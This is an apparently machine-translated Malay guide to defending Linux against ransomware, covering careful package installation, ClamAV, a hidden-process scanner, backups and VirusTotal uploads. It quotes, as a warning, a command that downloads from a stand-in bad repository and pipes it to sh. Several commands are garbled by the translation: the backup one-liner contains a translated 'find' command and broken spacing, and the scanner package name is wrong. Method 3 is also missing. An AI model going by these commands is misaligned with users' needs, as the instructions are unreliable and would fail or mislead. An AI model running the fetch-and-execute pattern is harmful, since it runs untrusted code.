Ransomware adalah salah satu masalah yang lebih mengancam dalam dunia keselamatan rangkaian hari ini. Sangat menakutkan apabila memikirkan bahawa seseorang dapat menyandera data anda. Sebilangan jangkitan ransomware menyulitkan semua data pada jumlah tertentu, dan individu di belakangnya menuntut sejumlah wang sebelum mereka akan bersetuju untuk melepaskan kunci yang diperlukan untuk membuka kunci data tersebut. Ini sangat menyangkut bagi orang yang mempunyai banyak wang yang dilaburkan dalam data mereka. Namun ada sedikit berita baik untuk pengguna Linux.
Dalam kebanyakan keadaan, kod ransomware sukar untuk menguasai apa-apa lebih daripada sekadar direktori utama pengguna. Program ini tidak mempunyai kebenaran untuk membuang keseluruhan pemasangan. Inilah sebabnya mengapa Linux ransomware lebih menjadi masalah pada pelayan di mana pengendali selalu mempunyai akses root. Ransomware tidak boleh menjadi masalah bagi pengguna Linux, dan ada beberapa langkah yang perlu diambil untuk mengelakkannya daripada berlaku kepada anda.
Kaedah 1: Mempertahankan Terhadap Serangan gaya BashCrypt
BasyCrypt adalah bukti sekeping konsep ransomware yang membuktikan kemungkinan menjangkiti struktur pelayan dengan jenis kod jahat ini. Ini memberikan asas untuk bagaimana bentuk pakej ransomware Linux. Walaupun mereka tidak biasa, langkah pencegahan akal sehat yang sama untuk pentadbir pelayan platform lain juga berfungsi di sini. Masalahnya ialah dalam lingkungan tingkat perusahaan mungkin ada sebilangan besar orang yang berbeda menggunakan sistem host.
Sekiranya anda menjalankan pelayan e-mel, sangat sukar untuk membuat orang tidak melakukan perkara bodoh. Lakukan yang terbaik untuk mengingatkan semua orang agar tidak membuka lampiran yang tidak mereka pasti, dan selalu malware mengimbas semua yang dimaksudkan. Satu perkara lain yang benar-benar dapat membantu mencegah serangan semacam ini adalah dengan melihat bagaimana anda memasang binari dengan wget. Sememangnya pelayan mel anda mungkin tidak mempunyai persekitaran desktop sama sekali dan anda mungkin menggunakan wget, apt-get, yum atau pacman untuk menguruskan pakej yang akan datang. Sangat penting untuk melihat repositori apa yang digunakan dalam pemasangan ini. Kadang kala anda akan melihat arahan yang mahu anda melaksanakan sesuatu seperti wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, atau mungkin ada di dalam skrip shell. Dengan cara apa pun, jangan jalankan jika anda tidak tahu untuk apa itu penyimpanan.
Kaedah 2: Memasang Pakej Pengimbas
Terdapat beberapa kepingan teknologi pengimbasan malware sumber terbuka. ClamAV adalah yang paling terkenal, dan anda boleh memasangnya di banyak pengedaran berdasarkan apt dengan menggunakan:
sudo apt-get install clamav
Apabila dipasang, man clamav harus menerangkan penggunaannya dalam bahasa biasa. Perlu diingat bahawa walaupun dapat mengimbas dan membuang fail yang dijangkiti, sebenarnya tidak dapat menghapus kod berjangkit dari fail. Ini adalah keadaan semua atau tidak.
Terdapat pengimbas kedua yang mungkin tidak anda kenali, tetapi berguna jika proses tersembunyi yang menakutkan anda. Sekali lagi jika anda menggunakan sebaran berasaskan apt, kemudian keluarkan arahan ini untuk memasang pengimbas yang tidak ditunjukkan:
sudo apt-get install unide
Apabila dipasang, taip:
sudo unide sys
Ini akan melakukan imbasan penuh sistem anda untuk sebarang proses tersembunyi.
Kaedah 4: Menjaga Sandaran Bersih di Tangan
Walaupun ini tidak seharusnya menjadi masalah kerana setiap orang harus selalu membuat sandaran, mempunyai sandaran yang baik dapat langsung mengeluarkan ransomware. Apa yang sangat sedikit ransomware pada platform Linux cenderung menyerang fail dengan sambungan yang khusus untuk platform pengembangan Web. Ini bermaksud jika anda mempunyai banyak kod .php, .xml atau .js, anda pasti ingin menyandarkannya. Pertimbangkan baris kod berikut:
tar -cf backups.tar $ (cari -nama '* .ruby' -atau -nama '* .html')
Ini harus membuat fail arkib pita besar setiap fail dengan sambungan .ruby dan .html dalam struktur fail. Ia kemudian boleh dipindahkan ke subdirektori sementara yang berbeza untuk pengekstrakan untuk memastikan bahawa membuatnya berfungsi dengan baik.
Arkib pita ini boleh dan harus dipindahkan ke jilid luaran. Anda tentu saja boleh menggunakan pemampatan .bz2, .gz atau .xv sebelum melakukannya. Anda mungkin ingin membuat sandaran cermin dengan menyalinnya ke dua jilid yang berbeza.
Kaedah 5: Menggunakan Pengimbas berasaskan Web
Mungkin anda telah memuat turun pakej RPM atau DEB dari laman web yang menjanjikan mengandungi perisian yang berguna. Perisian juga diedarkan melalui 7z atau fail tar yang dimampatkan juga. Pengguna mudah alih juga mungkin menerima pakej Android dalam format APK. Mudah untuk mengimbasnya dengan alat tepat di penyemak imbas anda. Arahkan ke https://www.virustotal.com/, dan setelah halaman dimuat tekan butang 'Pilih Fail'. Sebelum memuat naik, ingat bahawa ini adalah pelayan awam. Walaupun selamat dan dikendalikan oleh Alphabet Inc, ia memindahkan fail secara terbuka, yang mungkin menjadi masalah di beberapa persekitaran yang sangat selamat. Ia juga terhad kepada 128 MB fail.
Pilih fail anda di kotak yang muncul dan pilih buka. Nama fail akan muncul di baris di sebelah butang setelah kotak itu hilang.
Klik pada 'Imbasnya!' Berwarna biru besar butang. Anda akan melihat kotak lain yang menunjukkan bahawa sistem memuat naik fail anda.
Sekiranya seseorang telah memeriksa fail sebelumnya, maka ia akan memberitahu anda mengenai laporan sebelumnya. Ini menyedari ini berdasarkan jumlah SHA256, yang berfungsi dengan cara yang sama seperti alat baris perintah Linux yang sama seperti yang biasa anda gunakan. Sekiranya tidak, maka ia akan menjalankan imbasan penuh dengan 53 program pengimbasan yang berbeza. Sebilangan dari mereka mungkin habis masa fail dijalankan, dan hasil ini dapat diabaikan dengan selamat.
Beberapa program mungkin memberikan hasil yang berbeza daripada yang lain, jadi mudah untuk menyingkirkan positif yang salah dengan sistem ini. Bahagian yang terbaik ialah ia berfungsi di antara platform yang berbeza, yang menjadikannya sama menarik tanpa mengira pengedaran yang anda miliki pada peranti yang berbeza. Ia juga berfungsi dengan baik dari pengedaran mudah alih seperti Android, dan itulah sebabnya cara yang bagus untuk memeriksa pakej APK sebelum menggunakannya.
4 minit membaca
![[FIX] ESO 'Ralat Dalaman Tidak dijangka telah berlaku'](https://jf-balio.pt/img/how-tos/54/eso-an-unexpected-internal-error-has-occurred.png)
